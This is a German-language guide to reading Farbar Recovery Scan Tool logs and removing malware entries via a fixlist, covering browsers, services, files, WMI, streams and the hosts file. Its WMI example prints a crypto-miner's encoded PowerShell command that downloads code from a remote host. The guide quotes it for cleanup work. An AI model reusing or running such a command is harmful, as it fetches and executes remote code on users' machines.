FRST führt Firefox-Einträge und -Profile auf wenn sie vorhanden sind, selbst falls Firefox nicht mehr installiert sein sollte. Sollten mehrere Firefox-Profile bzw. Firefox-Klone vorhanden sein, so wird FRST Einstellungen und Erweiterungen aller Profile anzeigen. Nicht-standard Profile, die von Adware erzeugt werden, werden ebenfalls markiert.

Mit Ausnahme von FF DefaultProfile und FF DownloadDir können sämtliche Zeilen in die Fixlist hinzugefügt werden, dabei werden die Elemente entfernt.


FRST überprüft die digitale Signatur der Add-ons. Nicht signierte Add-ons werden wie folgt angezeigt.
Beispiel

Zitat:

FF Extension: (Adblocker for Youtube™) - C:\Program Files\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi [2018-01-18] [ist nicht signiert]

Chrome
FRST führt vorhandene Chrome-Einträge und Profile auf unabhängig davon ob Chrome installiert ist oder nicht. Wenn es mehrere Profile gibt, wird FRST die Einstellungen und Erweiterungen aller Profile aufführen. Nicht-standard Profile, die von Adware erzeugt werden, werden ebenfalls markiert.

Der Einstellungen Suchlauf schließt HomePage, StartupUrls, die Session Restore (Sitzungswiederherstellung) und einige Parameter von Standardsuchanbieter sowie erlaubte Notifications mit ein:

Zitat:

CHR HomePage: Default -> hxxp://www.web-pl.com/
CHR StartupUrls: Default -> "hxxp://www.web-pl.com/"
CHR DefaultSearchURL: Default -> hxxp://www.web-pl.com/search?q={searchTerms}
CHR Session Restore: Default -> ist aktiviert.
CHR Notifications: Default -> hxxps://www.speedtestace.co

Die Einträge HomePage, StartupUrls und Notifications werden gelöscht, wenn man sie in die fixlist einfügt. Fügt man andere Einträge in den Fix mit ein, so wird Chrome teilweise zurückgesetzt und ein Benutzer könnte den folgenden Hinweis sehen, wenn er das nächste Mal die Chrome-Einstellungen öffnet: "Chrome hat erkannt, dass einige ihrer Einstellungen durch ein anderes Programm verändert und auf die Standardeinstellungen zurückgesetzt wurden."

FRST erkennt auch New Tab -Weiterleitungen, die von Erweiterungen kontrolliert werden. Um die Weiterleitung zu entfernen, muss man die entsprechende Erweiterung identifizieren und mit Chrome selbst deinstallieren (siehe darunter).

Zitat:

CHR NewTab: Default -> Active:"chrome-extension://algadicmefalojnlclaalabdcjnnmclc/stubby.html"
CHR Extension: (RadioRage) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\algadicmefalojnlclaalabdcjnnmclc [2017-04-07]

Die Entfernung von Erweiterungen wird nicht unterstützt. Zeilen mit CHR Extension werden in einem Fix nicht bearbeitet, stattdessen ist Chromes selbst zu verwenden:
Tippe chrome://extensions in die Adresszeile und drücke Enter.
Klicke auf Entfernen unter der Erweiterung, die du entfernen möchtest.
Ein Diaglog zur Bestätigung erscheint, klicke auf Entfernen.

Eine Ausnahme ist ein Erweiterung-Installationsprogramm, das sich in der Registry (CHR HKLM and HKU) befindet. Wenn ein solcher Eintrag in die fixlist kopiert wird, wird der Schlüssel gelöscht.



Other Chromium-based browsers
Derzeit werden die folgenden Browser unterstützt: Brave, Opera, Vivaldi und Yandex.

Es gelten die gleichen Regeln wie für Google Chrome. Siehe dazu die Beschreibung darüber.

The same rules apply as for Google Chrome. See the description above.



Services (Dienste) und Drivers (Treiber)
Die Dienste und Treiber sind wie folgt dargestellt:

Laufstatus Starttyp Dienstname; ImagePath oder ServiceDLL [Größe Erstelldatum] (Name des Unterzeichners -> Name der Firma) [Überprüfung der Signatur]

Laufstatus - Der Buchstabe neben der Nummer stellt den Ausführungsstatus dar:

R=Running (Am Laufen)
S=Stopped (Angehalten)
U=Undetermined (Unbekannt)

Die "Starttyp" Zahlen sind:

0=Boot
1=System
2=Auto
3=Demand (bei Bedarf)
4=Disabled (Deaktiviert)
5=FRST kann es nicht auslesen.

Wenn am Ende der Zeile ein [X] zu sehen ist, bedeutet das, dass FRST nicht in der Lage war, die Datei zu finden und daher nur den ImagePath oder die ServiceDll, der in der Registry gespeichert ist, angibt.

Standard-Microsoft Dienste, die auf eine nicht-signierte Datei zeigen, verlangen eine Reparatur.

Zitat:

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

R2 DcomLaunch; C:\Windows\system32\rpcss.dll [512512 2010-11-20] (Microsoft Corporation) [Datei ist nicht signiert]
R2 RpcSs; C:\Windows\system32\rpcss.dll [512512 2010-11-20] (Microsoft Corporation) [Datei ist nicht signiert]

In diesem Fall muss die Datei mit einer intakten und signierten Datei ersetzt werden. Dafür nutzt man den Replace: Befehl.

Um einen bösartigen Dienst oder Treiber zu entfernen, kopiert die Zeile from Scan log in die fixlist. Die Datei muss ebenefalls aufgeführt werden:
Beispiel:

Zitat:

R1 94BE3917F6DF; C:\Windows\94BE3917F6DF.sys [619880 2019-03-07] (韵羽健康管理咨询（上海）有限公司 -> VxDriver) <==== ACHTUNG
C:\Windows\94BE3917F6DF.sys

Das Programm beendet alle Dienste, die in der fixlist aufgeführt wird und löscht den Dienst.

Wichtiger Hinweis: FRST gibt an, ob es einen laufenden Dienst erfolgreich beendet hat oder nicht. Unhabhängig davon wird FRST versuchen den Dienst zu löschen. Wenn ein laufender Dienst gelöscht wird, wird FRST den User informieren, dass ein Neustart nötig ist. FRST wird anschließend den Rechner neustarten. FRST wird ausserdem dem Log eine Zeile hinzufügen in dem der Neustart vermerkt ist. Wenn der Dienst beendet wurde, ist kein Neustart notwendig.

Es gibt eine Ausnahme, bei der FRST den entsprechenden Dienst nicht löscht, sondern repariert. Falls der Dienst "Themes" von Malware manipuliert wurden, findet man folgendes:

Zitat:

S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Windows -> Microsoft Corporation) [DependOnService: iThemes5]<==== ACHTUNG

Wenn dieser Eintrag in die fixlist eingefügt wird, werden die Parameter auf den Standard-Eintrag zurückgesetzt.

Die folgende Zeile sollte nicht in die fixlist aufgenommen werden:

Zitat:

"Dienstname" => Dienst wurde entsperrt. <==== ACHTUNG

Diese Nachricht weist darauf hin, dass FRST zerstörte Berechtigungen erkannt und automatisch während des Suchlaufs behoben hat. Ein neues FRST Logfile sollte angefordert werden, um das Ergebnis zu überprüfen. Wenn notwendig, kann die standard Dienstzeile in die fixlist aufgenommen werden.



NetSvcs
Die NetSvc Einträge werden jeweils in einer eigenen Zeile aufgeführt:

Zitat:

NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ()
NETSVCx32: WpSvc -> kein Dateipfad

Wichtiger Hinweis: Fügt man die Netsvc Zeile in die fixlist ein, wird nur der netsvc-Eintrag entfernt. Der dazugehörige Dienst (sofern in der Sektion Dienste vorhanden) und die Datei müssen separat gelöscht werden.

Beispiel:
Um den Netsvc Eintrag, den Dienst und die DLL zu löschen, müsste die fixlist wie folgt aussehen:

Zitat:

S2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [239016 2016-07-21] (Qihoo 360 Software (Beijing) Company Limited -> ) <==== ACHTUNG
NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ()
C:\Program Files (x86)\LuDaShi

One month (Created/Modified) (Ein Monat (Erstellte/Geänderte))
Bei den Log der erstellten Dateien, wird erst das Erstelldatum, dann das Datum der letzten Veränderung aufgeführt. Bei den modifizierten Dateien ist die Reihenfolge umgekehrt: Erst das Datum der Letzten Änderung, anschließend das Erstelldatum.
Die Dateigröße ist ebenfalls aufgeführt. Handelt es sich um einen Ordner, so ist die Größe mit 000000 angegeben.

Wichtiger Hinweis: Um lange Scanzeiten zu vermeiden und die Logs kurz zu halten, ist der Scan auf bestimmte Orte begrenzt. FRST führt Ordner auf, aber nicht deren Inhalt. Wenn der Inhalt überprüft werden soll, muss der Folder: Befehl benutzt werden.

Wichtiger Hinweis: Die Überprüfung digitaler Signaturen ist auf ausführbare Microsoft Dateien (standardmäßig gefiltert) begrenzt. Andere digitale Signaturen werden nicht überprüft. Um eine zusätzliche Liste mit unsignierte ausführbaren Dateien zu erhalten, muss der optionale Suchlauf SigCheckExt verwendet werden.


FRST führt auch die Attribute der Dateien auf:

C - Compressed (komprimiert)
D - Directory (ordner)
H - Hidden (versteckt)
L - Symbolic Link (symbolischer link)
N - Normal (hat keinerlei Attribute)
O - Offline
R - Readonly (kein Schreibrecht)
S - System
T - Temporary (temporäre Datei)
X - No scrub (keine Bereinigungsdatei) (hier Windows 8+)

Um eine Datei oder einen Ordner zu löschen, kann man einfach die Zeile in die fixlist einfügen.

Zeilen, die auf symbolische Links (das Attribut L) zeigen, werden korrekt bearbeitet.
Beispiel:

Zitat:

2018-02-21 21:04 - 2018-02-21 21:04 - 000000000 ___DL C:\WINDOWS\system32\Link

Wird diese Zeile in die fixlist aufgenommen, so wird FRST nur die Verlinkung löschen, das Ziel wird nicht angerührt:

Zitat:

Symbolischer Link gefunden: "C:\WINDOWS\system32\Link" => "C:\Windows\System32\Ziel"
"C:\WINDOWS\system32\Link" => Symbolischer Link erfolgreich entfernt
C:\WINDOWS\system32\Link => erfolgreich verschoben

Alternativ kann der Befehl DeleteJunctionsInDirectory: verwendet werden.

Um andere, nicht in der Rubrik erwähnte Dateien/Ordner, zu entfernen, kann man deren Pfad einfach in die fixlist einfügen. Es sind keine Anführungszeichen für Pfade mit Leerzeichen notwendig:

Zitat:

c:\Windows\System32\Drivers\bösartigeDatei.sys
C:\Program Files (x86)\BösartigerOrdner

Hat man zahlreiche Dateien mit ähnlichen Namen, so kann man Platzhalter einsetzen.

Man kann also entweder alle Dateien aufführen:

Zitat:

C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At8.job
C:\Windows\Tasks\At13.job
C:\Windows\Tasks\At52.job

Oder einen Platzhalter benutzen:

Zitat:

C:\Windows\Tasks\At*.job

Wichtiger Hinweis: Ein Fragezeichen wird nicht als Wildcard akezpetiert, siehe dazu auch den Abschnitt "Unicode" im 2. Post "Einleitung". Des Weiteren werden keine Wildcards für Ordner akzeptiert.




FLock
Diese Sektion listet gesperrte Dateien und Ordner in Standardverzeichnissen auf.



FCheck
In dieser Sektion werden "schlechte" Dateien aufgeführt, z. B. DLL-Hijacking. Außerdem werden Null Byte Dateien (.exe und .dll Dateien) in Standardverzeichnissen aufgelistet. Der Abschnitt wird nur angezeigt, wenn übereinstimmende Elemente vorhanden sind.

Wird ein Eintrag in die fixlist eingefügt, so wird die Datei/der Ordner verschoben.



KnownDLLs
Einige der hier aufgeführten Dateien können, wenn nicht vorhanden oder korrumpiert, den Rechner unbootbar machen. Daher erscheint dieser Teil des Logs auch nur, wenn der Scan in der Recovery Environment ausgeführt worden ist.
Einträge erscheinen nur, wenn es Probleme gibt. Ist alles in Ordnung, werden sie nicht aufgeführt.

Vorsicht muss walten bei der Handhabung der Dateien in diesem Abschnitt. Wenn eine Datei fehlt oder verändert wurde, findet sich zumeist eine gute Kopie auf dem Rechner des Systems. Am besten holt man sich sachkundige Hilfe zum Identifizieren der benötigten Datei. Bitte siehe in den Abschnitt Befehle dieser Anleitung, in der gezeigt wird, wie eine Datei ersetzt wird und im Abschnitt "Weitere optionale Suchläufe" wird gezeigt, wie man eine Suche ausführt.



SigCheck
FRST überprüft eine Reihe von wichtigen Systemdateien. Dateien, die keine korrekte digitale Signatur besitzen, oder Dateien, die fehlen, werden aufgelistet. Außerhalb der Wiederherstellungsumgebung nutze diese Sektion eine Whitelist, wenn es keine Probleme mit den Dateien gibt.

Modifizierte Dateien des Betriebssystem sind ein Hinweis auf einen möglichen Malwarebefall. Wenn eine dieser Befälle identifiziert wurde, sollte ein Experte zu Rat gezogen werden, da ein inkorrektes Entfernen der Malware den Rechner unbootbar machen könnte.

Beispiel eines Hijacker.DNS.Hosts Befalls:

Zitat:

C:\WINDOWS\system32\dnsapi.dll
[2015-07-10 13:00] - [2015-07-10 13:00] - 0680256 _____ (Microsoft Corporation) 5BB42439197E4B3585EF0C4CC7411E4E

C:\WINDOWS\SysWOW64\dnsapi.dll
[2015-07-10 13:00] - [2015-07-10 13:00] - 0534064 _____ (Microsoft Corporation) 4F1AB9478DA2E252F36970BD4E2C643E

Wenn eine Datei nicht signiert ist, so muss man diese mit einer intakten und signierten Datei ersetzen. Dafür nutzt man den Replace: - Befehl.

Einige Versionen einer SmartService Infektion deaktivieren die Wiederherstellungsumgebung. FRST kehrt die BCD Modifikation während des Suchlaufs automatisch um:

Zitat:

BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== erfolgreich wiederhergestellt

Die sicherste Art, in den abgesicherten Modus zu booten, ist mithilfe der F8-Taste (Windows 7 und älter) oder dem Erweiterten Start (Windows 11, Windows 10 und Windows 8) möglich. In einigen Fällen werden die User mithilfe von MSConfig in den abgesicherten Modus booten. Ist der abgesicherte Modus jedoch kaputt, befinden sich die User dann in einer Endlosschleife, aus der sie nicht mehr in den normalen Modus booten können. In einem solchen Fall enthält FRST.txt folgenden Eintrag:

Zitat:

safeboot: Minimal ==> Das System ist konfiguriert in den abgesicherten Modus zu starten <===== ACHTUNG

Um das Problem zu beheben, reicht es, die Zeile in die fixlist zu kopieren. FRST setzt dann den normalen Modus wieder als Standard Bootmodus.

Wichtiger Hinweis: Dies gilt für Windows Vista und neuer.



Association (Verknüpfungen)
Wichtiger Hinweis: Der Abschnitt "Association (Verknüpfungen)" erscheint in der FRST.txt nur, wenn FRST im Recovery Environment ausgeführt worden ist. Wenn FRST im normalen Modus oder abgesicherten Modus ausgeführt wurde, ist die Rubrik in der Addition.txt zu finden. In der Recovery Environment wird nur die .exe Endung kontrolliert.

Hier wird die allgemeine exe-Endung angezeigt:

Zitat:

HKLM\...\exefile\open\command: C:\Windows\svchost.com "%1" %* <===== ACHTUNG

Wie auch bei anderen Registry-Einträgen, kann man die Zeile einfach in die fixlist.xt kopieren, um sie auf ihren Standardwert zurückzusetzen. Es muss kein Registryfix dafür geschrieben werden.



Restore Points (Wiederherstellungspunkte)
Wichtiger Hinweis: Der Abschnitt "Restore Points (Wiederherstellungspunkte)" erscheint in der FRST.txt nur, wenn FRST im Recovery Environment ausgeführt worden ist. Wenn FRST im normalen Modus oder abgesicherten Modus ausgeführt wurde, ist die Rubrik in der Addition.txt zu finden.

Die Wiederherstellungspunkte werden hier aufgeführt.

Wichtiger Hinweis: FRST kann nur für Windows XP die Wiederherstellungspunkte laden. Wenn man ein Vista System auf einen alten Wiederherstellungspunkt zurücksetzten will, sollte man das in der Recovery Environment mittels der Windows System Recovery Options tun.


Um die Registry auf den Status eines Wiederherstellungspunktes zurückzusetzen, reicht es, die Zeile in die fixlist zu kopieren.

Beispiel für XP:

Zitat:

RP: -> 2010-10-26 19:51 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP83
RP: -> 2010-10-24 13:57 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP82
RP: -> 2010-10-21 20:02 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP81

Um die Registry Hives aus dem Wiederherstellungspunkt 82 (vom 24.10.2010) wiederherzustellen, reicht es, die Zeile in die fixlist zu kopieren:

Zitat:

RP: -> 2010-10-24 13:57 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP82

Memory info (Speicherinformationen)
Wichtiger Hinweis: Der Abschnitt "Memory info (Speicherinformationen)" erscheint in der FRST.txt nur, wenn FRST im Recovery Environment ausgeführt worden ist. Wenn FRST im normalen Modus oder abgesicherten Modus ausgeführt wurde, ist die Rubrik in der Addition.txt zu finden und wird weitere Informationen (BIOS, Motherboard, Prozessor) beinhalten.

Die Rubrik gibt Auskunft über die Menge an RAM im Rechner und wieviel davon benutzt wird. Dies kann Probleme am Rechner erklären. Wenn etwa das angeblich vorhandene RAM nicht mit dem angezeigten übereinstimmt, kann dies auf einen kaputten RAM-Riegel, einen fehlerhalten Steckplatz am Motherboard oder ein veraltetes BIOS hinweisen.
Bei 32-bit mit mehr als 4GB installiertem RAM wird das Maximum dennoch 4GB sein, da dies die Obergrenze für 32bit Anwendungen ist.

Virtueller Speicherplatz und freier virtueller Speicherplatz werden ebenfalls aufgeführt.



Drives (Laufwerke) und MBR & Partition Table (MBR & Partitionstabelle)

Wichtiger Hinweis: Die Abschnitte "Drives (Laufwerke)" und "MBR & Partition Table (MBR & Partitionstabelle)" erscheint in der FRST.txt nur, wenn FRST im Recovery Environment ausgeführt worden ist. Wenn FRST im normalen Modus oder abgesicherten Modus ausgeführt wurde, ist die Rubrik in der Addition.txt zu finden.

Hier werden feste und entfernbare Laufwerke angezeigt, die zum Zeitpunkt des Suchlaufs am Rechner angeschlossen waren. Nicht gemountete Laufwerke werden durch GUID Pfade identifiziert.

Zitat:

Drive c: (OS) (Fixed) (Total:223.02 GB) (Free:173.59 GB) (Model: Force MP500) NTFS
Drive f: (Flash drive) (Removable) (Total:1.91 GB) (Free:1.88 GB) FAT32
Drive g: (Recovery) (Fixed) (Total:0.44 GB) (Free:0.08 GB) (Model: Force MP500) NTFS
Drive x: (Boot) (Fixed) (Total:0.5 GB) (Free:0.49 GB) NTFS

\\?\Volume{74a80af8-ff89-444b-a7a3-09db3d90fd32}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

Bei UEFI/GPT-basierten Partitionsschemen: Nur das Standard-GPT Layout wird erkannt, aber eine vollständige Liste der Partitionen ist nicht verfügbar.

Zitat:

Disk: 0 (Protective MBR) (Size: 223.6 GB) (Disk ID: 00000000)

Partition: GPT.

Bei BIOS/MBR-basierten Partitionsschemen: Der MBR Code und die Partitionseinträge werden erkannt. Logische Partitionen in erweiterten Partitionen werden nicht gelistet.

Zitat:

Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 73FD73FD)
Partition 1: (Active) - (Size=39.1 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=426.7 GB) - (Type=0F Extended)

Wenn man Hinweise hat, dass der MBR verändert wurde, sollte man sich diesen genauer anschauen. Am besten mit einem Dump. Dies kann wie folgt getan werden:

Der Befehl kann in jedem von FRSTs Ausführungsmodi benutzt werden:

Zitat:

SaveMbr: drive=0 (oder die entsprechende drive-Nummer)

Er speichert den MBR in die Datei MBRDUMP.txt. Die Datei befindet sich im selben Ordner wie FRST.

Wichtiger Hinweis: Obwohl ein MBR Dump sowohl im normalen Modus als auch in der RE erstellt werden kann, ist es immer zu bevorzugen, den Dump in der RE vorzunehmen, da einige Bootkits einen sauberen MBR vortäuschen können, wenn Windows geladen ist.



LastRegBack
FRST analysiert das System und führt alle Registry-Backups, die das System gemacht hat, auf. Das Backup enthält ein Backup aller Registry Hives, es unterscheidet sich daher von dem LKGC (Last Known Good Configuration), das nur das Controlset beinhaltet.
Es gibt eine Reihe von Gründen, warum man eines dieser Backups benutzen wollen könnte. Eine der häufigsten ist eine kaputte oder fehlende Registry:

Manchmal kann man folgendes im FRST Header sehen:

Zitat:

ACHTUNG: System Hive konnte nicht geladen werden

Um das zu reparieren, reicht es, die folgende Zeile in die fixlist einzufügen:

Zitat:

LastRegBack: >> Datum << >> Zeit <<

Beispiel:

Zitat:

LastRegBack: 2013-07-02 15:09

Zusätzlicher Suchlauf (Addition.txt)

Header
Der Header enthält ein paar nützliche Infos:

Beispiel:

Zitat:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-09-2023
durchgeführt von M-K-D-B (10-09-2023 13:13:32)
Gestartet von C:\Users\M-K-D-B\Desktop
Microsoft Windows 10 Home Version 22H2 19045.3393 (X64) (2021-05-18 20:14:14)
Start-Modus: Normal

Erste Zeile: FRST Version und ob es sich um die 32- oder 64bit version handelt.
Zweite Zeile: Der Benutzer, der das program ausgeführt hat und das Datum an dem es ausgeführt wurde.
Dritte Zeile: Von wo wurde das Programm ausgeführt
Vierte Zeile: gib die Version von Windows und das Installationsdatum an.
Fünfte Zeile: In welchem Boot Modus wurde das Programm ausgeführt.



Accounts (Konten)
Listet die Standard-Benutzerkonten nach dem folgenden Schema: Lokaler Kontoname (Konto SID -> Rechte - Aktiviert/Deaktiviert) -> Pfad zum Benutzerkonto
Microsoft Benutzerkonten werden nicht angezeigt.

Schädliche Einträge können hinzugefügt werden, um entfernt zu werden.

Beispiel:

Zitat:

WgaUtilAcc (S-1-5-21-1858304819-142153404-3944803098-1002 - Administrator - Enabled) => erfolgreich entfernt

Wichtiger Hinweis: Nur das Konto selbst wird entfernt. Der eventuelle Benutzerordner im Benutzerverzeichnis sollte zum Verschieben separat aufgeführt werden.



Security Center (Sicherheits-Center)
Diese Liste kann veraltete Einträge beinhalten, in diesem Fall kann der Eintag in die fixlist kopiert werden. Einige Programme können die Entfernung verhindern, in solchen Fällen erscheint folgende Nachricht:

Zitat:

Sicherheits-Center Eintrag: Dieser Eintrag ist geschützt. Stellen Sie sicher dass die Software deinstalliert und der Dienst entfernt wurde.

Installed Programs (Installierte Programme)
Listet klassische Desktop Programme und Windows 11/10/8 Pakete auf. Progressive Web-Apps werden zusammen unter "Chrome apps" angezeigt.

Vorinstallierte saubere Microsoft Pakete sind auf einer Whitelist. Pakete von Microsoft und anderen Herausgebern, die Werbung unterstützen, werden mit [MS Ad] gekennzeichnet.
Beispiel:

Zitat:

App Radio -> C:\Program Files\WindowsApps\34628NielsCup.AppRadio_9.1.40.6_x64__kz2v1f325crd8 [2019-06-04] (Niels Cup) [MS Ad]

Aktivierte oder deaktivierte Einträge, die unter Startup erscheinen, sind mit [Startup Task] beschriftet.

FRST besitzt eine eingebaute Datenbank mit den Namen von bekannten Adware/PUP Desktop-Programmen.
Beispiel:

Zitat:

Zip Opener Packages (HKU\S-1-5-21-3240431825-2694390405-104744025-1000\...\Zip Opener Packages) (Version: - ) <==== ACHTUNG

Es wird empfohlen derartige Programme zu deinstallieren bevor man andere Säuberungtools ausführt. Da die Deinstallation in der Regel mehr rückgängig macht als die Säuberungstools entfernen.

Desktop Programme, die unter "Programme und Features" sichtbar sind, werden mit der folgenden Bezeichnung aufgelistet:

Zitat:

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden

Es gibt viele legitime Programme, die aus guten Gründen versteckt sind. Für den Fall, dass es ein schädlilches Programm ist, kann der Eintrag in die fixlist eingefügt werden.

Wichtiger Hinweis: Dieser Fix macht das Programm in der Systemsteuerung sichtbar und deinstalliert das Programm nicht.



Custom CLSID (Benutzerdefinierte CLSID)
Listet benutzerdefinierte Classes auf, die in den Benutzer-Hives, ShellServiceObjectDelayLoad, ShellServiceObjects, ShellExecuteHooks, ShellIconOverlayIdentifiers, ContextMenuHandlers und FolderExtensions erzeugt werden.
Beispiel:

Zitat:

ContextMenuHandlers1: [SystemHelper] -> {851aab5c-2010-4157-9c5d-a28dfa7b2660} => C:\Windows\ExplorerPlug.dll [2018-03-03] (Диспетчер источников) [Datei ist nicht signiert]

Um die bösartigen Einträge zu entfernen, können diese einfach in die fixlist eingefügt werden. FRST wird die Schüssel aus der Registry entfernen. Die dazugehörigen Dateien/Ordner sollten manuell in die fixlist aufgeführt werden, um entfernt zu werden.

Wichtiger Hinweis: Es können sich auch legitime Einträge in diesem Abschnitt befinden, Vorsicht walten lassen!



Codecs
Wird ein Eintrag in die fixlist aufgenommen, so werden modifizierte Standardeinträge wiederhergestellt und benutzerdefinierte Einträge werden von der Registrierungsdatenbank entfernt. Die zugehörigen Dateien sollten zum Verschieben separat aufgelistet werden.



Shortcuts (Verknüpfungen) und WMI
Verknüpfungen in den Ordnern C:\ProgramData\Microsoft\Windows\Start Menu\Programs und C:\Users\Public\Desktop und im Profilordner des eingeloggten Benutzers werden gescannt. Veränderte oder suspekte Verknüpfungen werden hier aufgelistet.
Die Zeilen können der fixlist zum Entfernen hinzugefügt werden. Siehe auch die "Shortcut.txt" in "Weitere optionale Suchläufe".

Wichtiger Hinweis: Die Shortcut.txt führt alle Verknüpfungen von allen Benutzern im System auf. Die Additions.txt beinhaltet nur die Einträge die als bedenklich eingestuft wurden und im Profil des eingeloggten Benutzer sind.


FRST scannt WMI Namensräume auf nicht-standard Registrierungen. Bekannte Infektionen werden gekennzeichnet.

Das folgende Beispiel stammt von einer Kryptowährung-Miner Infektion:

Zitat:

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"****youmm4\"",Filter="__EventFilter.Name=\"****youmm3\":: <==== ACHTUNG
WMI:subscription\__EventFilter->****youmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ACHTUNG
WMI:subscription\CommandLineEventConsumer->****youmm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnA GgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (Der Dateneintrag hat 665 Zeichen mehr).] <==== ACHTUNG

Um die Malware zu entfernen, müssen die Zeilen in die fixlist eingefügt werden.

Wichtiger Hinweis: OEM-Software (z. B. Dell) kann auch benutzerdefinierte Registrierungen erzeugen. Daher ist es notwendig, unbekannte Einträge zu recherchieren, um überprüfen zu können, ob die Einträge legitim sind or nicht.



Loaded Modules (Geladene Module)
Geladene Module werden - basierend auf einer gültigen digitalen Signatur - nur angezeigt, wenn sie nicht einer Überprüfung der Signatur genügen (Whitelist).



Alternate Data Streams
FRST führt ADS als Teil der Addition.txt auf:

Zitat:

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ==========

AlternateDataStreams: C:\Windows\System32\legitimeDatei:malware.exe [134]
AlternateDataStreams: C:\malware:malware.exe [134]

Die Größe des ADS wird in den [] angezeigt.
Wenn der ADS sich auf einem legitimen Ordner/einer leigitmen Datei befindet, kann man die komplette Zeile einfach in die fixlist kopieren.

Beispiel:

Zitat:

AlternateDataStreams: C:\Windows\System32\legitimeDatei:malware.exe

Ist der Ordner/die Datei ebenfalls bösartig, dann schreibt man:

Zitat:

C:\malware

Im ersten Fall entfernt FRST nur den ADS, im zweiten den Ordner/die Datei mitsamt dem ADS.



Safe Mode (Abgesicherter Modus)
Falls einer der Hauptschlüssel (Safeboot, Safeboot\minimal oder Safeboot\network) fehlt wird dieses im Log fehlt. In solchen Fällen muss der Schlüssel manuell wieder erstellt werden.
Ist ein bösartiger Eintrag in diesem Abschnitt zu sehen, kann er mittels fixlist entfernt werden.



Association (Verknüpfungen) - siehe Verknüpfungen weiter oben
Die Endungen .bat, .cmd, .com, .exe, .reg und .scr werden angezeigt. Fügt man einen Standard-Schlüssel in die fixlist ein so wird dieser auf Werkeinstellungen zurückgesetzt. Andere Schlüssel werden einfach gelöscht.



Internet Explorer
In dieser Sektion beinhaltet die Version des Internet Explorers unter Windows 7 und älter .

Je nach Objekttyp löscht FRST Elemente aus der Registry oder stellt ihren Standardstatus wieder her.
Begleitende Dateien / Ordner sollten separat eingegeben werden, wenn sie verschoben werden müssen.



Hosts content (Hosts Inhalt) - Siehe Hosts weiter oben
Zeigt die Eigenschaften der Hosts-Datei, sowie die ersten 30 aktiven Einträge (kommentierte Einträge werden nicht angezeigt)
Beispiel:

Zitat:

2009-07-14 04:34 - 2016-04-13 15:39 - 00001626 _____ C:\Windows\system32\Drivers\etc\hosts

107.178.255.88 www.google-analytics.com
107.178.255.88 www.statcounter.com
107.178.255.88 statcounter.com
107.178.255.88 ssl.google-analytics.com
107.178.255.88 partner.googleadservices.com
107.178.255.88 google-analytics.com
107.178.248.130 static.doubleclick.net
107.178.247.130 connect.facebook.net

Die Zeilen können nicht einzeln entfernt werden.
- Um die ganze Hosts Datei zurückzusetzen, nutze den Befehl Hosts: oder kopiere die Warnung aus dem FRST.txt in die fixlist.
- Im Falle einer benutzerdefinierten hosts.ics Datei muss der Datepfad in die fixlist eingefügt werden.


Other Areas (Andere Bereiche)
Einige Sachen werde unter diesem Begriff zusammengefasst, da sie sonst nirgendswo erwähnt werden. Diese Einträge werden nur gelistet, sie können derzeit nicht mit FRST gefixt werden.

Path - Der Eintrag ist under den folgenden Bedingungen sichtbar: Der Standardstring fehlt, eine falsche Plazierung des Standardstrings, kein Wert.
Beispiel:

Zitat:

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path ->

Um die Path-Variable zu reparieren, kann ein manueller Registry Fix oder ein Editor für Umgebungsvariablen verwendet werden.

Wichtiger Hinweis: Die Beschädigung der Path-Variable kann sich auf Operationen von CMD: und Powershell: Anweisungen auswirken, die einen relativen Pfad zu Konsolentools verwenden.


Wallpaper - Verschiedene Verschlüsselungstrojaner nutzen diese Einstellungen, um Ihre "Nachricht/Meldung" zu projezieren.

Beispiel:

Zitat:

Ein normaler Pfad könnte so aussehen:
HKU\S-1-5-21-2507207478-166344414-3466567977-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

Ein bösartiger Pfad inklusive Datei könnte so aussehen:
HKU\S-1-5-21-746137067-261478967-682003330-1003\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\user\My Documents\!Decrypt-All-Files-scqwxua.bmp

Bei Malware-Einträgen kann der Dateipfad (ggf. zusammen mit weiteren Dateien, die in der FRST.txt gefunden wurden) in die fixlist aufgenommen werden.

Wichtiger Hinweis: Entfernt man die Malware Wallpaper Datei, wird der Desktophintergrund entfernt.

